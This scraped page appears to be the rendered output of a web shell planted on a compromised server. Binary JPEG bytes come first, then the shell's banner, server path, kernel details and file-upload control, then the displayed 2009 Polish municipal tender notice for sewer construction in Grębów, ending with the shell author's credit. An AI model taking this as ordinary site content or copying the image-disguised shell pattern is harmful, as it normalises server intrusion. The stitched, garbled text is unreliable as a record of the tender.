JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090218/32900-N-2009.html

<p class="kh_header"><b>Grębów: Budowa kanalizacji sanitarnej w miejscowościach Krawce, Wydrza,Stale Siedlisko</b><br>
<b>Numer ogłoszenia: 32900 - 2009; data zamieszczenia: 18.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grębów , Grębów 394, 39-410 Grębów, woj. podkarpackie, tel. 015 8112911, 8112715, faks 015 8112871.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grebow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w miejscowościach Krawce, Wydrza,Stale Siedlisko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa kanalizacji sanitarnej w miejscowości  Krawce, Wydrza, Stale Siedlisko - o długości 51722 m wraz z 31 przepompowniami ścieków.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.25.56.00-5, 45.11.12.00-0, 45.23.24.23-3, 45.31.53.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości 200 000,00 zł  (słownie dwieście tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)Posiadają uprawnienia do wykonywania działalności projektowej oraz budowlanej. Potwierdzeniem spełniania warunków będzie przedstawienie dokumentu (odpisu z KRS, zaświadczenia o wpisie do ewidencji działalności gospodarczej), z którego będzie wynikać , że Wykonawca prowadzi działalność objętą przedmiotem zamówienia. W przypadku wspólnego ubiegania się o udzielenie zamówienia, wystarczające do potwierdzenia spełniania warunku jest prowadzenie działalności objętej przedmiotem zamówienia przez co najmniej jednego z partnerów konsorcjum/ wspólników spółki cywilnej.
2)Dysponują odpowiednio wykwalifikowanym personelem w celu obsadzenia podanych niżej stanowisk:
-Kierownik Budowy - posiada uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
-  przynależy do właściwej izby samorządu zawodowego; 
- posiada co najmniej 4 lat doświadczenia zawodowego jako kierownik  
  budowy.
- wykaże się doświadczeniem jako Kierownik budowy przy realizacji minimum jednego kontraktu obejmującego swym zakresem budowę kanalizacji o długości  min 30 km.
- Kierownik robót branży elektrycznej  - musi być członkiem właściwej izby samorządu zawodowego oraz posiadać aktualne na dzień składania ofert zaświadczenie o ubezpieczeniu OC a także uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń. Wymagane doświadczenie na stanowisku kierownika robót -  co najmniej 3 lata.
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie.
3)W ciągu ostatnich trzech lat przed dniem wszczęcia postępowania zatrudniali
   co najmniej:
-	3 osoby (personel kierowniczy)
-	20 osób (pracownicy)
4)	Dysponują maszynami i urządzeniami niezbędnymi do realizacji zamówienia:	
- Wciągarka	-  1 szt.
- koparka gąsienicowa	-  2 szt.
- koparka	-  2 szt.
- ubijak mechaniczny	-  4 szt.
- spycharka gąsienicowa	-  2 szt.
- wibromłot	-  1 szt.
- żuraw samochodowy	-  2 szt.
- spawarka 	-  1 szt.
- ciągnik kołowy 	-  1 szt.
- zestaw igłofiltrów do odwodnień	- 3 kpl.
5) W ciągu ostatnich 5 lat przed dniem wszczęcia postępowania  o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie wykonali w ramach jednego lub dwóch zadań roboty budowlane obejmujące swym zakresem budowę kanalizacji o łącznej długości min. 40 000 mb, z czego jedno zadanie winno obejmować swym zakresem budowę kanalizacji o wartości minimum    5 000 000 pln brutto.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie;
W przypadku doświadczenia wyrażonego w EURO, do przeliczeń należy wziąć średni kurs EURO ogłoszony przez Narodowy Bank Polski w dniu zawarcia umowy z tym Zamawiającym, dla którego wykonano wymieniony zakres robót;
6) Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej 
działalności gospodarczej na kwotę co najmniej 5 000 000 zł. 
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców 
o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć 
ten lub ci z partnerów konsorcjum/wspólników spółki cywilnej, którzy będą wykazywać spełnianie ww. warunków.
7) posiadają dostęp do środków finansowych  lub zdolność kredytową w wysokości    3 000 000 zł.
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców 
o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć 
ten lub ci z partnerów konsorcjum/wspólników spółki cywilnej, którzy będą wykazywać spełnianie ww. warunków.
8) Nie podlegają wykluczeniu w trybie art. 24 ustawy.
Powyższe warunki będą podlegały ocenie jakościowej:  Spełnia/nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,
2) informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy wystawiona nie wcześniej niż 6 miesięcy przed terminem składania ofert,
3) informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy wystawiona nie wcześniej niż 6 miesięcy przed terminem składania ofert,
4)  zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
5)  rachunek zysków i strat  zaś w przypadku wykonawców nie zobowiązanych do sporządzania rachunku zysków i strat, inne dokumenty określające obroty, zysk oraz zobowiązania i należności - za ostatnie 3 lata. 
6)  kopia lub kopie  polisy ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej obejmującej zakres czynności podobnych do określonych w niniejszym zamówieniu na kwotę co najmniej 5 000 000 zł. 
7)  informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości 3 000 000 zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
8)  wykaz niezbędnych do wykonania zamówienia maszyn i urządzeń, którymi dysponuje lub będzie dysponował wykonawca.
9) pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 8, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował
10) uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie, zaświadczenia o członkostwie w Polskiej Izbie Inżynierów Budownictwa i o ubezpieczeniu od odpowiedzialności cywilnej 
11) wykaz personelu odpowiedzialnego za realizację robót ich doświadczenia i kwalifikacje zawodowe 
12)pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 11, wykonawca wskazał osoby, którymi będzie dysponował
13)wykaz ważniejszych robót zrealizowanych w okresie ubiegłych 5 lat  o charakterze i złożoności porównywalnej z zakresem zamówienia,
14)informacja na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego w okresie ostatnich 3 lat 
15)oświadczenie w trybie art. 22 ust 1 i art. 24 ust. 1 i 2  ustawy PZP.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.grebow.un.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Grębów  39-410 Grębów pok nr 17 w godz. pracy Urzędu.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 09:30, miejsce: Urząd Gminy Grębów 39-410 Grębów pok. nr 12 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com